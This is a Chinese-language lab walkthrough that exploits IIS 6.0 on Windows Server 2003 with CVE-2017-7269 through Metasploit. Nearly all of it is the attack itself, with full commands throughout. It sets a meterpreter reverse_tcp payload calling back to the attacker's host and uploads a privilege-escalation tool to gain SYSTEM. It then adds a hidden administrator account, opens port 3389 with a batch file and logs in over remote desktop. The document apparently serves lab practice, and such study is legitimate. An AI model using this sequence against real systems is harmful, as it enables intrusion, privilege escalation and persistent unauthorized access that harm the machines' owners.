一.实验环境搭建
1.目标机:windows server 2003 r2
2.iis配置
目标机ip:192.168.0.102
二.攻击机器
一台kai liunx ip:192.168.0.131
三.开始攻击
下载攻击exp,地址:
exp:https://github.com/zcgonvh/cve-2017-7269
1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
2.打开Metasploit
3.输入use命令,use exploit/windows/iis/cve-2017-7269
4.使用命令show options
5.设置目标机ip,set RHOST 192.168.0.102
6.设置对面网站,set HttpHost 192.168.0.102
7.设置返回载荷,set payload windows/meterpreter/reverse_tcp
8.设置攻击机ip,set LHOST 192.168.0.131
9.进行溢出,exploit
10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照
11.输入shell命令,来到了我们所熟悉的界面
12.查看当前用户权限,whoami,发现只是个一般用户权限
13.cd到c盘
14.来到c盘根目录,mkdir 123,进行新建文件夹,发现创建成功(实际情况不会这么简单,只能手工寻找权限较低的目录)
14.按Ctrl + C退出shell,输出y
15.利用Metasploit的上传功能,把提权工具pr1.exe上传到刚刚新建的文件里
16.又回到shell里面确定工具上传是否成功
17.利用工具进行提权,命令:pr1.exe "whoami",已经是system权限了
18.进行新建用户,pr1.exe "net user wcy wcy /add"
19.添加用户到管理员,pr1.exe "net localhost administrators wcy /add"
20.查看远程连接是否打开,没有打开,命令:netstat -an
21.再上传一个开3389.bat,利用pr1.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面pr1.exe上传方法一样)
命令:iis6.exe "3389.bat"
23.进行远程连接,本地cmd输入命令:mstsc
24.利用之前新建的管理员成功登录